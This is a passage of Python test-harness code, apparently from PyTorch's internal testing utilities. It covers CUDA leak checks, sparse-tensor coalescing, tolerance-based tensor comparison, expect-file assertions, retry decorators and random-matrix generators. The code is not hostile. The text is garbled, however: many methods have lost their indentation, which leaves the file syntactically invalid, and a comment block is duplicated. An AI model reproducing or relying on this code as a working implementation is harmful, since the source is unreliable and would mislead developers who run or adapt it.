                self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
    def assertLeaksNoCudaTensors(self, name=None):
        # Context manager (CudaMemoryLeakCheck) asserting no CUDA memory
        # growth across its body; *name* labels the failure message.
        name = self.id() if name is None else name
        return CudaMemoryLeakCheck(self, name)
    def enforceNonDefaultStream(self):
        # Context manager moving all CUDA devices off the default stream.
        return CudaNonDefaultStream()
    def wrap_with_cuda_policy(self, method_name, policy):
        """Rebind *method_name* on this instance so it runs inside the given
        CUDA policy context — but only for CUDA-related tests on a
        CUDA-capable build."""
        test_method = getattr(self, method_name)
        # the import below may initialize CUDA context, so we do it only if
        # self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
        # is True.
        from torch.testing._internal.common_cuda import TEST_CUDA
        fullname = self.id().lower() # class_name.method_name
        if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
            setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
    def wrap_method_with_cuda_policy(self, method, policy):
        """Return *method* bound to self, wrapped so it executes inside
        `with policy():`."""
        # Assumes that `method` is the tested function in `self`.
        # NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
        #       alive, so this cannot be done in setUp and tearDown because
        #       tearDown is run unconditionally no matter whether the test
        #       passes or not. For the same reason, we can't wrap the `method`
        #       call in try-finally and always do the check.
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            with policy():
                method(*args, **kwargs)
        return types.MethodType(wrapper, self)
    def wrap_with_cuda_memory_check(self, method):
        # Convenience wrapper: apply the memory-leak-check policy to *method*.
        return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
    def setUp(self):
        # Honor PYTORCH_TEST_SKIP_FAST (skip everything not tagged by
        # @slowTest), the GitHub-issue disable list, and reseed all RNGs so
        # each test starts from the same state.
        if TEST_SKIP_FAST:
            if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
                raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
        check_disabled(str(self))
        set_rng_seed(SEED)
    def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
        """Generate a random sparse COO tensor of the given *size* with *nnz*
        non-zeros over the first *sparse_dim* dimensions; returns
        (tensor, indices_clone, values_clone). When *is_uncoalesced*, values
        and indices are duplicated so the tensor has repeated coordinates."""
        # Assert not given impossible combination, where the sparse dims have
        # empty numel, but nnz > 0 makes the indices containing values.
        assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
        v_size = [nnz] + list(size[sparse_dim:])
        v = torch.randn(*v_size, device=device)
        # Random fractional indices scaled up to each sparse dim's extent,
        # then truncated to integer coordinates.
        i = torch.rand(sparse_dim, nnz, device=device)
        i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
        i = i.to(torch.long)
        if is_uncoalesced:
            v = torch.cat([v, torch.randn_like(v)], 0)
            i = torch.cat([i, i], 1)
        x = torch.sparse_coo_tensor(i, v, torch.Size(size))
        if not is_uncoalesced:
            x = x.coalesce()
        else:
            # FIXME: `x` is a sparse view of `v`. Currently rebase_history for
            #        sparse views is not implemented, so this workaround is
            #        needed for inplace operations done on `x`, e.g., copy_().
            #        Remove after implementing something equivalent to CopySlice
            #        for sparse views.
            # NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
            x = x.detach().clone()
        return x, x._indices().clone(), x._values().clone()
    def safeToDense(self, t):
        # Coalesce through the checked safeCoalesce path before densifying.
        r = self.safeCoalesce(t)
        return r.to_dense()
    def safeCoalesce(self, t):
        """Coalesce sparse tensor *t* while cross-checking the result against
        a slow reference coalescing implemented in Python; returns the
        reference-built tensor."""
        tc = t.coalesce()
        self.assertEqual(tc.to_dense(), t.to_dense())
        self.assertTrue(tc.is_coalesced())
        # Our code below doesn't work when nnz is 0, because
        # then it's a 0D tensor, not a 2D tensor.
        if t._nnz() == 0:
            self.assertEqual(t._indices(), tc._indices())
            self.assertEqual(t._values(), tc._values())
            return tc
        # Reference coalesce: sum values sharing an index tuple.
        value_map = {}
        for idx, val in zip(t._indices().t(), t._values()):
            idx_tup = tuple(idx.tolist())
            if idx_tup in value_map:
                value_map[idx_tup] += val
            else:
                value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
        # Rebuild with indices in sorted order, as coalesce() guarantees.
        new_indices = sorted(list(value_map.keys()))
        new_values = [value_map[idx] for idx in new_indices]
        if t._values().ndimension() < 2:
            new_values = t._values().new(new_values)
        else:
            new_values = torch.stack(new_values)
        new_indices = t._indices().new(new_indices).t()
        tg = t.new(new_indices, new_values, t.size())
        self.assertEqual(tc._indices(), tg._indices())
        self.assertEqual(tc._values(), tg._values())
        if t.is_coalesced():
            self.assertEqual(tc._indices(), t._indices())
            self.assertEqual(tc._values(), t._values())
        return tg
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: support bfloat16 comparisons
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
    def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
        """Assert that *torch_fn* applied to *tensor_like* (as a torch tensor)
        matches *np_fn* applied to the equivalent NumPy array.

        When *tensor_like* is already a torch.Tensor, *device*/*dtype* must
        be None; otherwise they determine how the tensor is constructed.
        """
        assert TEST_NUMPY
        # bfloat16 has no NumPy counterpart; see get_comparison_dtype.
        assert dtype is not torch.bfloat16
        if isinstance(tensor_like, torch.Tensor):
            assert device is None
            assert dtype is None
            a = tensor_like.detach().cpu().numpy()
            t = tensor_like
        else:
            a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
            t = torch.tensor(tensor_like, device=device, dtype=dtype)
        np_result = np_fn(a)
        torch_result = torch_fn(t).cpu()
        # Converts arrays to tensors
        if isinstance(np_result, np.ndarray):
            try:
                np_result = torch.from_numpy(np_result)
            except Exception:
                # NOTE: copying an array before conversion is necessary when,
                #       for example, the array has negative strides.
                np_result = torch.from_numpy(np_result.copy())
        self.assertEqual(np_result, torch_result)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
    def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
                        exact_dtype=True, exact_device=False) -> _compare_return_type:
        """Compares two dense tensors, returning (True, None) when they are
        equal(-ish) and (False, debug_msg) when they are not.

        Validates device, size and dtype before delegating the value
        comparison to _compare_tensors_internal with appropriate tolerances.
        """
        assert (atol is None) == (rtol is None)
        if not isinstance(a, torch.Tensor):
            return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
        if not isinstance(b, torch.Tensor):
            return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))

        # Validates tensors are on the same device
        if exact_device and a.device != b.device:
            return (False, ("Attempted to compare equality of tensors on "
                            "different devices! Got devices {0} and "
                            "{1}.".format(a.device, b.device)))

        # Compares tensors of different devices on the CPU
        if a.device != b.device:
            a = a.cpu()
            b = b.cpu()

        # Checks size matches
        if a.size() != b.size():
            return (False, ("Attempted to compare equality of tensors with "
                            "different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))

        # Checks dtype (if exact_dtype)
        if exact_dtype and a.dtype is not b.dtype:
            return (False, ("Attempted to compare equality of tensors with "
                            "different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))

        # Acquires rtol and atol
        if rtol is None:
            rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
        # self.precision (settable per-test, e.g. via precisionOverride) acts
        # as a floor on the absolute tolerance.
        atol = max(atol, self.precision)

        # Converts to comparison dtype
        dtype = get_comparison_dtype(a, b)
        a = a.to(dtype)
        b = b.to(dtype)

        return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
atol = max(atol, self.precision)
return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
    def assertEqualIgnoreType(self, *args, **kwargs) -> None:
        # Compares values while suppressing assertEqual's dtype check.
        # If you are seeing this function used, that means the test is written
        # wrongly and deserves detailed investigation.
        return self.assertEqual(*args, exact_dtype=False, **kwargs)
# Compares x and y
# TODO: default exact_device to True
    # Compares x and y
    # TODO: default exact_device to True
    def assertEqual(self, x, y, msg: Optional[str] = None, *,
                    atol: Optional[float] = None, rtol: Optional[float] = None,
                    equal_nan=True, exact_dtype=True, exact_device=False) -> None:
        """Recursively compares x and y with dtype-aware tolerances.

        Dispatches on the types of x and y: tensor/number mixes are unwrapped
        with .item(), tensors are compared via _compareTensors (with special
        handling for sparse and quantized layouts), containers are compared
        element-wise, and scalars go through _compareScalars. Anything else
        falls back to unittest's assertEqual.
        """
        assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"

        # Tensor x Number and Number x Tensor comparisons
        if isinstance(x, torch.Tensor) and isinstance(y, Number):
            self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(y, torch.Tensor) and isinstance(x, Number):
            self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        # Tensor x np.bool
        elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
            self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
            self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
                             exact_dtype=exact_dtype, exact_device=exact_device)
        # Tensor x Tensor
        elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
            # Layout properties must agree before any values are compared.
            super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
            super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
            if x.is_sparse:
                # Sparse tensors are coalesced, then indices and values are
                # compared separately.
                x = self.safeCoalesce(x)
                y = self.safeCoalesce(y)
                indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
                                                                 rtol=rtol, atol=atol,
                                                                 equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                                 exact_device=exact_device)
                if not indices_result and msg is None:
                    assert debug_msg is not None
                    msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
                self.assertTrue(indices_result, msg=msg)
                values_result, debug_msg = self._compareTensors(x._values(), y._values(),
                                                                rtol=rtol, atol=atol,
                                                                equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                                exact_device=exact_device)
                if not values_result and msg is None:
                    assert debug_msg is not None
                    msg = "Sparse tensor values failed to compare as equal! " + debug_msg
                self.assertTrue(values_result, msg=msg)
            elif x.is_quantized and y.is_quantized:
                # Quantization parameters must match, then the integer
                # representations are compared.
                self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
                if x.qscheme() == torch.per_tensor_affine:
                    self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
                                     msg=msg, exact_dtype=exact_dtype,
                                     exact_device=exact_device)
                    self.assertEqual(x.q_zero_point(), y.q_zero_point(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                elif x.qscheme() == torch.per_channel_affine:
                    self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
                                     msg=msg, exact_dtype=exact_dtype,
                                     exact_device=exact_device)
                    self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                    self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
                                     atol=atol, rtol=rtol, msg=msg,
                                     exact_dtype=exact_dtype, exact_device=exact_device)
                result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
                                                         y.int_repr().to(torch.int32),
                                                         atol=atol, rtol=rtol,
                                                         exact_dtype=exact_dtype,
                                                         exact_device=exact_device)
                if not result and msg is None:
                    assert debug_msg is not None
                    msg = "Quantized representations failed to compare as equal! " + debug_msg
                self.assertTrue(result, msg=msg)
            else:
                result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
                                                         equal_nan=equal_nan, exact_dtype=exact_dtype,
                                                         exact_device=exact_device)
                if not result and msg is None:
                    assert debug_msg is not None
                    msg = "Tensors failed to compare as equal! " + debug_msg
                self.assertTrue(result, msg=msg)
        elif isinstance(x, string_classes) and isinstance(y, string_classes):
            super().assertEqual(x, y, msg=msg)
        elif type(x) == set and type(y) == set:
            super().assertEqual(x, y, msg=msg)
        elif isinstance(x, dict) and isinstance(y, dict):
            # OrderedDicts compare items in order; plain dicts compare key
            # sets, then values in x's key order.
            if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
                self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
            else:
                self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
                                 msg=msg, exact_dtype=exact_dtype,
                                 exact_device=exact_device)
                key_list = list(x.keys())
                self.assertEqual([x[k] for k in key_list],
                                 [y[k] for k in key_list],
                                 atol=atol, rtol=rtol, msg=msg,
                                 exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(x, type) and isinstance(y, type):
            # See TestTorch.test_assert_equal_generic_meta
            super().assertEqual(x, y, msg=msg)
        elif is_iterable(x) and is_iterable(y):
            super().assertEqual(len(x), len(y), msg=msg)
            for x_, y_ in zip(x, y):
                self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
                                 exact_dtype=exact_dtype, exact_device=exact_device)
        elif isinstance(x, bool) and isinstance(y, bool):
            self.assertTrue(x == y, msg=msg)
        # Scalar x Scalar
        elif isinstance(x, Number) and isinstance(y, Number):
            result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
                                                     equal_nan=equal_nan)
            if not result and msg is None:
                assert debug_msg is not None
                msg = "Scalars failed to compare as equal! " + debug_msg
            self.assertTrue(result, msg=msg)
        else:
            super().assertEqual(x, y, msg=msg)
def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
prec = delta
if places:
prec = 10**(-places)
rtol = None if prec is None else 0
self.assertEqual(x, y, msg=msg, atol=prec, rtol=rtol)
    def assertNotEqual(self, x, y, msg: Optional[str] = None, *,
                       atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
        """Asserts x and y are NOT equal under assertEqual's comparison rules
        (including the given tolerances) by expecting assertEqual to fail."""
        with self.assertRaises(AssertionError, msg=msg):
            self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def maybeWarnsRegex(self, category, regex=''):
"""Context manager for code that *may* warn, e.g. ``TORCH_WARN_ONCE``.
This filters expected warnings from the test log and fails the test if
any unexpected warnings are caught.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
# Ignore expected warnings
warnings.filterwarnings("ignore", message=regex, category=category)
try:
yield
finally:
if len(ws) != 0:
msg = 'Caught unexpected warnings:\n'
for w in ws:
msg += warnings.formatwarning(
w.message, w.category, w.filename, w.lineno, w.line)
msg += '\n'
self.fail(msg)
    def assertExpected(self, s, subname=None):
        r"""
        Test that a string matches the recorded contents of a file
        derived from the name of this test and subname. This file
        is placed in the 'expect' directory in the same directory
        as the test script. You can automatically update the recorded test
        output using --accept.

        If you call this multiple times in a single function, you must
        give a unique subname each time.
        """
        if not isinstance(s, str):
            raise TypeError("assertExpected is strings only")

        def remove_prefix(text, prefix):
            if text.startswith(prefix):
                return text[len(prefix):]
            return text
        # NB: we take __file__ from the module that defined the test
        # class, so we place the expect directory where the test script
        # lives, NOT where test/common_utils.py lives. This doesn't matter in
        # PyTorch where all test scripts are in the same directory as
        # test/common_utils.py, but it matters in onnx-pytorch
        module_id = self.__class__.__module__
        munged_id = remove_prefix(self.id(), module_id + ".")
        test_file = os.path.realpath(sys.modules[module_id].__file__)
        expected_file = os.path.join(os.path.dirname(test_file),
                                     "expect",
                                     munged_id)

        subname_output = ""
        if subname:
            expected_file += "-" + subname
            subname_output = " ({})".format(subname)
        expected_file += ".expect"
        expected = None

        def accept_output(update_type):
            # Overwrites the expect file with the current output (--accept).
            print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
            with open(expected_file, 'w') as f:
                f.write(s)

        try:
            with open(expected_file) as f:
                expected = f.read()
        except IOError as e:
            if e.errno != errno.ENOENT:
                raise
            elif expecttest.ACCEPT:
                # Expect file missing and --accept given: record and pass.
                return accept_output("output")
            else:
                raise RuntimeError(
                    ("I got this output for {}{}:\n\n{}\n\n"
                     "No expect file exists; to accept the current output, run:\n"
                     "python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id))

        # a hack for JIT tests
        if IS_WINDOWS:
            expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
            s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)

        # Adjust for producer_version so recorded ONNX output stays valid
        # across torch version bumps.
        expected = expected.replace(
            'producer_version: "XXX"',
            'producer_version: "{}"'.format(torch.onnx.producer_version)
        )
        if expecttest.ACCEPT:
            if expected != s:
                return accept_output("updated output")
        else:
            if hasattr(self, "assertMultiLineEqual"):
                # Python 2.7 only
                # NB: Python considers lhs "old" and rhs "new".
                self.assertMultiLineEqual(expected, s)
            else:
                self.assertEqual(s, expected)
    def assertExpectedStripMangled(self, s, subname=None):
        # Strips JIT-mangled qualified names (tokens starting with
        # "__torch__") before comparing against the expect file, since the
        # mangling is not stable across runs.
        s = re.sub(r'__torch__[^ ]+', '', s)
        self.assertExpected(s, subname)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
import subprocess
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
pipes = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
return pipes.communicate()[1].decode('ascii')
    # Python-version compatibility shims: unittest renamed several assert*
    # methods in 3.2/3.5; alias the old implementations under the modern
    # names when running on older interpreters.
    if sys.version_info < (3, 2):
        # assertRegexpMatches renamed to assertRegex in 3.2
        assertRegex = unittest.TestCase.assertRegexpMatches
        # assertRaisesRegexp renamed to assertRaisesRegex in 3.2
        assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
    if sys.version_info < (3, 5):
        # assertNotRegexpMatches renamed to assertNotRegex in 3.5
        assertNotRegex = unittest.TestCase.assertNotRegexpMatches
def download_file(url, binary=True):
    """Downloads `url` into the writable test data directory and returns the
    local path; reuses an existing download. Skips the calling test (via
    unittest.SkipTest) when the download fails."""
    from urllib.parse import urlsplit
    from urllib import request, error

    filename = os.path.basename(urlsplit(url)[2])
    data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
    path = os.path.join(data_dir, filename)

    if os.path.exists(path):
        # Cached from an earlier run.
        return path
    try:
        data = request.urlopen(url, timeout=15).read()
        mode = 'wb' if binary else 'w'
        with open(path, mode) as f:
            f.write(data)
        return path
    except error.URLError:
        msg = "could not download test file '{}'".format(url)
        warnings.warn(msg, RuntimeWarning)
        raise unittest.SkipTest(msg)
def find_free_port():
    """Returns a TCP port on localhost that was free at call time.

    NOTE: the socket is closed before returning, so another process may grab
    the port in the meantime; callers should retry on bind failures (see
    retry_on_connect_failures).
    """
    # The context manager closes the socket even if bind/getsockname raises,
    # which the old explicit close() did not.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('localhost', 0))
        return sock.getsockname()[1]
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."


def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
    """Reruns a test if the test returns a RuntimeError and the exception
    matches exactly with one of the strings in connect_errors.

    Usable both as a bare decorator and as a decorator factory:
    @retry_on_connect_failures or
    @retry_on_connect_failures(connect_errors=(...,)).
    """
    # BUGFIX: the default used to be the bare string ADDRESS_IN_USE, which
    # made `str(error) in connect_errors` a substring test rather than the
    # exact match the docstring promises; a one-element tuple restores exact
    # matching.
    if func is None:
        # Used as a decorator factory with arguments.
        return partial(retry_on_connect_failures, connect_errors=connect_errors)

    @wraps(func)
    def wrapper(*args, **kwargs):
        tries_remaining = 10
        while True:
            try:
                return func(*args, **kwargs)
            except RuntimeError as error:
                # Retry (with a small random backoff) only on the known
                # transient connection errors; anything else propagates.
                if str(error) in connect_errors:
                    tries_remaining -= 1
                    if tries_remaining == 0:
                        raise
                    time.sleep(random.random())
                    continue
                raise
    return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
    """Retries the decorated function up to `tries` times on ExceptionToCheck,
    sleeping `delay` seconds between attempts.

    After the final failure: raises unittest.SkipTest (chained to the original
    error) when skip_after_retries is True, otherwise re-raises the error.
    """
    def deco_retry(f):
        @wraps(f)
        def f_retry(*args, **kwargs):
            mtries, mdelay = tries, delay
            while mtries > 1:
                try:
                    return f(*args, **kwargs)
                except ExceptionToCheck as e:
                    msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
                    print(msg)
                    time.sleep(mdelay)
                    mtries -= 1
            # Final attempt: no more retries.
            try:
                return f(*args, **kwargs)
            except ExceptionToCheck as e:
                # BUGFIX: the old one-liner
                #   raise SkipTest(...) from e if skip_after_retries else e
                # parsed as `raise SkipTest(...) from (e if ... else e)`,
                # so it ALWAYS raised SkipTest. Branch explicitly instead.
                if skip_after_retries:
                    raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e
                raise
        return f_retry  # true decorator
    return deco_retry
# Methods for matrix generation
# Used in test_autograd.py and test_torch.py
def prod_single_zero(dim_size):
    """Returns a random square matrix whose [0, 1] entry is zeroed out."""
    matrix = torch.randn(dim_size, dim_size)
    matrix[0, 1] = 0
    return matrix
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
    """Returns a random l x l matrix with exactly the given rank, built by
    editing the singular values of a random matrix."""
    assert rank <= l
    A = torch.randn(l, l, dtype=dtype, device=device)
    u, s, v = A.svd()
    # Any accidental zero among the leading singular values would lower the
    # rank, so bump those to 1; zero out the rest to cap the rank.
    for i in range(rank):
        if s[i] == 0:
            s[i] = 1
    s[rank:] = 0
    return u.mm(torch.diag(s)).mm(v.transpose(0, 1))
def random_symmetric_matrix(l, *batches, **kwargs):
    """Returns (batches of) random symmetric l x l matrices."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    base = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
    # Averaging a matrix with its own transpose symmetrizes it.
    return (base + base.transpose(-2, -1)).div_(2)
def random_symmetric_psd_matrix(l, *batches, **kwargs):
    """Returns (batches of) random symmetric positive semi-definite
    l x l matrices."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    base = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
    # A @ A^T is symmetric PSD for any A.
    return torch.matmul(base, base.transpose(-2, -1))
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
    """Returns (batches of) random symmetric positive-definite matrices."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    base = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
                       dtype=dtype, device=device)
    # A @ A^T is PSD; adding a tiny multiple of the identity makes it
    # strictly positive definite.
    eye = torch.eye(matrix_size, dtype=dtype, device=device)
    return torch.matmul(base, base.transpose(-2, -1)) + eye * 1e-5
def make_nonzero_det(A, sign=None, min_singular_value=0.1):
    """Returns A with its singular values clamped to at least
    min_singular_value (so the determinant is bounded away from zero).

    When `sign` is given, the sign of the determinant is forced to match it
    by negating the first row of any offending matrix (which flips the
    determinant's sign).
    """
    u, s, v = A.svd()
    s.clamp_(min=min_singular_value)
    A = torch.matmul(u, torch.matmul(torch.diag_embed(s), v.transpose(-2, -1)))
    det = A.det()
    if sign is not None:
        if A.dim() == 2:
            det = det.item()
            if (det < 0) ^ (sign < 0):
                A[0, :].neg_()
        else:
            # Flip every batch element whose determinant has the wrong sign.
            cond = ((det < 0) ^ (sign < 0)).nonzero()
            if cond.size(0) > 0:
                for i in range(cond.size(0)):
                    # BUGFIX: `A[list(cond[i])]` is advanced indexing and
                    # returns a COPY, so the in-place neg_() silently modified
                    # a temporary. Indexing with a tuple of ints selects a
                    # view, so the negation reaches A.
                    A[tuple(int(k) for k in cond[i])][0, :].neg_()
    return A
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
                                                   **kwargs):
    """Returns (batches of) square matrices with singular values
    1/(n+1), 2/(n+1), ..., n/(n+1): full rank, all distinct."""
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    silent = kwargs.get("silent", False)
    if silent and not torch._C.has_lapack:
        # Without LAPACK there is no SVD; return a benign placeholder.
        return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)

    base = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
    u, _, v = base.svd()
    sigma = torch.arange(1., matrix_size + 1, dtype=dtype, device=device) \
        .mul_(1.0 / (matrix_size + 1)).diag()
    sigma = sigma.expand(batch_dims + (matrix_size, matrix_size))
    return u.matmul(sigma.matmul(v.transpose(-2, -1)))
def random_matrix(rows, columns, *batch_dims, **kwargs):
    """Return rectangular matrix or batches of rectangular matrices.

    Parameters:
      dtype - the data type
      device - the device kind
      singular - when True, the output will be singular
    """
    dtype = kwargs.get('dtype', torch.double)
    device = kwargs.get('device', 'cpu')
    silent = kwargs.get("silent", False)
    singular = kwargs.get("singular", False)
    if silent and not torch._C.has_lapack:
        # Without LAPACK there is no SVD; return a benign placeholder.
        return torch.ones(rows, columns, dtype=dtype, device=device)

    base = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
    u, _, v = base.svd(some=False)
    k = min(rows, columns)
    # Prescribe singular values 1/(k+1), ..., k/(k+1) along the diagonal.
    s = torch.zeros(rows, columns, dtype=dtype, device=device)
    for i in range(k):
        s[i, i] = float(i + 1) / (k + 1)
    if singular:
        # make matrix singular
        s[k - 1, k - 1] = 0
        if k > 2:
            # increase the order of singularity so that the pivoting
            # in LU factorization will be non-trivial
            s[0, 0] = 0
    return u.matmul(s.expand(batch_dims + (rows, columns)).matmul(v.transpose(-2, -1)))
